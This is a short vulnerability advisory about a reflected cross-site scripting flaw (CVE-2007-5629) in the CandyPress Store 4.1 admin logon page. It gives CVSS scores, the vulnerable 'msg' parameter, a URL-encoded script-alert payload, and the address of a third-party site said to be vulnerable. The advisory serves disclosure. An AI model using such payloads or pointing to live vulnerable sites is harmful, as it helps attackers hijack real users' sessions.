CandyPress Store 4.1 - XSS

2007-10-21 / 2007-10-22
Credit: Snoop Security
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2007-5629
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! Product : CandyPress Store Version : 4.1 Bug Kind:XSS Vendor Site:http://www.candypress.com Discovered by: Snoop Security Researching Committee We Are: it's an Underground...so ssshh!!! no one know us... This Bug blog to : Snoop Security And darkness_king www.snoop-security.com !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ About Candypress: CandyPress Store is an eCommerce solution based on popular Microsoft technologies. It is designed to run on an IIS web server that is ASP and VBScript enabled. In addition, the software is designed to work with SQL Server or MS Access databases. The Bug is affected in here:/admin/logon.asp?msg=Snoop Security also this way:/admin/logon.asp?msg=%3Cscript%3E%20alert('snoop%20security');%20%3C/script%3E some example vuln pages: http://www.ineedfrom.com/admin/logon.asp?msg=%3Cscript%3E%20alert('snoop%20security');%20%3C/script%3E


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top